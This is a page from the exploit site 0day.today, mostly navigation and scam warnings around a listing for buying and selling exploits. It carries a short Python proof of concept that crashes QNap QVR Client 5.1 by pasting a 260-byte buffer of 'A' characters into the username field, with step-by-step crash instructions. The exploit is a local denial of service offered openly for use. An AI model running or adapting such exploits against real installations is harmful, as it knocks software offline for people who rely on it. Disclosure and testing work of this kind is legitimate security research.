0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
QNap QVR Client 5.1.0.11290 - Crash PoC
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title : QNap QVR Client 5.1.0.11290 Crash PoC # Discovery by : Luis Martínez # Email : l4m5@hotmail.com # Discovery Date : 05/11/2015 # Vendor Homepage: http://www.qnapsecurity.com/n/en/ # Software Link : http://download.qnap.com/Surveillance/Utility/QMon_20150630.zip # Tested Version : 5.1 # Vulnerability Type : Denial of Service (DoS) Local # Tested on OS : Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code : python qvr_client_5.1.py # 2.- Open qvr_client_5.1.txt and copy content to clipboard # 3.- Open QVR Client # 4.- Direccion IP/Puerto -> 10.10.10.1 / 80 # 5.- Paste ClipBoard on "Nombre de Usuario" # 6.- Contraseña -> test # 7.- Aceptar # 8.- Crashed buffer = "\x41" * 260 f = open ("qvr_client_5.1.txt", "w") f.write(buffer) f.close() # 0day.today [2024-11-15] #